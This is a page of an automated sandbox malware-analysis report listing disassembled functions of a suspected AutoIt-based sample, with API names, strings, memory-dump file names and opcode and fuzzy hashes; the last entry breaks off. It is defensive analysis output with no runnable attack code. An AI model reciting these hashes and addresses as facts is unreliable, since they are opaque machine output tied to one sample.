                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 2358735015-567219261
                                                                                                                    • Opcode ID: e8f19a5743db36bfa40ff4ab688d7487be941168aa9240204af6d44f73d497fe
                                                                                                                    • Instruction ID: 446eb13f8d73d14699d1d711e78306cc863fecaa7888ba7600f56a6c69a63051
                                                                                                                    • Opcode Fuzzy Hash: e8f19a5743db36bfa40ff4ab688d7487be941168aa9240204af6d44f73d497fe
                                                                                                                    • Instruction Fuzzy Hash: F791D322B19A5385EA648F25C6415BD23A1BB14BA4B588131DE1DF37D4EF3FE84BC340
                                                                                                                    Function 00007FF656076920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                    • Instruction ID: 3f23b87765e8c0f4a766fa09bf0b894644379f7942fdb3a63c30d775fe02b92c
                                                                                                                    • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                    • Instruction Fuzzy Hash: D691CC26B08B5285EB50EF65E1402AD33B5FB88B98F484432DE4EA7755DF39E889C740
                                                                                                                    Function 00007FF656059898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                    • Instruction ID: fac1e6dd19249914bf02a8f358f84994ead3c78680dab0b7fa8e056e0db7d9f3
                                                                                                                    • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                    • Instruction Fuzzy Hash: DD41E332F19A9344EEA04F299604179A291EB34FD4B5C4631CA5DE37D4EE3FE84AC700
                                                                                                                    Function 00007FF656019B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: #$E$O
                                                                                                                    • API String ID: 3215553584-248080428
                                                                                                                    • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                                    • Instruction ID: 65da0a5aadc3477c85158798d9845698f4f3ef24a360ecef48804b5bd7907672
                                                                                                                    • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                                    • Instruction Fuzzy Hash: AD418A32A19B5185EF518F619E401A923A4BF54B8CF0C4531EE8EA7B99DF3EE449C700
                                                                                                                    Function 00007FF65605B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 3196045410-1173974218
                                                                                                                    • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                                    • Instruction ID: 408ac331dd42994c0a366b3eda4017c18afa186c95d49b14ea7c11512c3b9f61
                                                                                                                    • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                                    • Instruction Fuzzy Hash: C9417622A08B4395EB60EF24D9511FD2764FFA5788F880035DA4DA3A99EF3DE60DC700
                                                                                                                    Function 00007FF65604DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 787153527-1403004172
                                                                                                                    • Opcode ID: 50f1d75fbf58418a8b746d3a4e6e520a523a5a635b2cd0adfcd1e093ce64af6b
                                                                                                                    • Instruction ID: d8fd194b0c50ddc70a7f02f4aae4cf9c42c17718d893e88ed9cdc6bb2f0ba5f0
                                                                                                                    • Opcode Fuzzy Hash: 50f1d75fbf58418a8b746d3a4e6e520a523a5a635b2cd0adfcd1e093ce64af6b
                                                                                                                    • Instruction Fuzzy Hash: 40310522A0968282EA30EB11E5545B97361FF95F84F4C4631DE9DA3795CF3DE64ECB00
                                                                                                                    Function 00007FF65606D914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                                    • Instruction ID: 3cfadf6d51c0d1f5604ebe553a5eafa6b559bb056482384c84f135dc27f2b7a1
                                                                                                                    • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                                    • Instruction Fuzzy Hash: 3E31E632A0C79282FB609F12A610A6E6360FB84B94F5C5131EE4DA7B85DE3ED44AC700
                                                                                                                    Function 00007FF6560893E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                                    • Instruction ID: 61f99baaab68a1cc8136d121868d0e6700d55d87db296a97ba02ed0400ef5ab0
                                                                                                                    • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                                    • Instruction Fuzzy Hash: A531BE32609781CAEB60DF25E54476A33A1FB85B81F584139DA5D93B94DF3DD848CB00
                                                                                                                    Function 00007FF656009164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                                    • Instruction ID: 2baa71974daa2462c0e79ee108e613c66d0b00713056ea4512aa3c55f1849233
                                                                                                                    • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                                    • Instruction Fuzzy Hash: 6BF04F21B29A4281EE499F11F58427963A2EF88794F8C5035E91F97764DF7DD48DC700
                                                                                                                    Function 00007FF6560745A4 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2227131780-0
                                                                                                                    • Opcode ID: 6d4788a4abc5ce2114f5ac25091d31e77d7f9f094256cfd739c645a6feeb5206
                                                                                                                    • Instruction ID: 0374136f1431be4d468dbae11adae437c5226909c35272a620cbd3f99b03cea9
                                                                                                                    • Opcode Fuzzy Hash: 6d4788a4abc5ce2114f5ac25091d31e77d7f9f094256cfd739c645a6feeb5206
                                                                                                                    • Instruction Fuzzy Hash: D9A1F626B0868282DB90EB26D5542BE6790FF81F98F484531DE4ED7795DF3DE508CB00
                                                                                                                    Function 00007FF65607E838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488606520-0
                                                                                                                    • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                                    • Instruction ID: 7da2ac90a1d7eeb812dcc38cc48c88a979a1b08143afa6c66cb0270fb6f70fe6
                                                                                                                    • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                                    • Instruction Fuzzy Hash: BF817D26B0969285EB14DF22D5586AD37A1BB48FD8F088035DE0DA7B96CF3DE805CB40
                                                                                                                    Function 00007FF6560802DC Relevance: 7.7, APIs: 5, Instructions: 159registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3451389628-0
                                                                                                                    • Opcode ID: adfb7868244c5e1d0bfc560eceff1a8588b273cb05b564dbeb42a9c501cb6717
                                                                                                                    • Instruction ID: 3e379396f9b0b96932b9a54f0162ebb012fad2b7b1ec8b4ab8f24eaf75a95df9
                                                                                                                    • Opcode Fuzzy Hash: adfb7868244c5e1d0bfc560eceff1a8588b273cb05b564dbeb42a9c501cb6717
                                                                                                                    • Instruction Fuzzy Hash: B3718C76B08A428AEB50DF65D1953BD3760FB84B8CF488132DA0EA7A96CF38D509C744
                                                                                                                    Function 00007FF65601E67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659116390-0
                                                                                                                    • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                                    • Instruction ID: f3107c4702fb41d53a10bb5ae07e14faa65ffba73ed298826e5ec9e6ef815253
                                                                                                                    • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                                    • Instruction Fuzzy Hash: 2151B032A14A518AF710CB65E9843AC7BB0FB48B9CF088135DE4EA7799DF79D14AC700
                                                                                                                    Function 00007FF656080084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3740051246-0
                                                                                                                    • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                    • Instruction ID: 951e08564bdd7bf6bfb7458d9ebbc92870db99514b8662692c60a5be73fa4a2d
                                                                                                                    • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                    • Instruction Fuzzy Hash: 1661C222A08A8285EB50DF65D4893BD7770FB84B98F484132DB4DA7AA6CF7CD549CB40
                                                                                                                    Function 00007FF65607D0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D176
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D217
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D236
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D281
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D2A0
                                                                                                                      • Part of subcall function 00007FF656004120: WideCharToMultiByte.KERNEL32 ref: 00007FF656004160
                                                                                                                      • Part of subcall function 00007FF656004120: WideCharToMultiByte.KERNEL32 ref: 00007FF65600419C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 666041331-0
                                                                                                                    • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                    • Instruction ID: cd0c53b93699c3379d463fd6289a9ea9cf4c1ca7f4b7499e095e295747fd53f6
                                                                                                                    • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                    • Instruction Fuzzy Hash: 75518B36B14B4285EB40DF62D9881AC73B0FB98F88B494032DE4EA3791DF39D846C710
                                                                                                                    Function 00007FF65605670C Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4136290138-0
                                                                                                                    • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                                    • Instruction ID: 83bd058b001d370d17fa325c498fb278c685262fed69f6fdf97fd83cb325211e
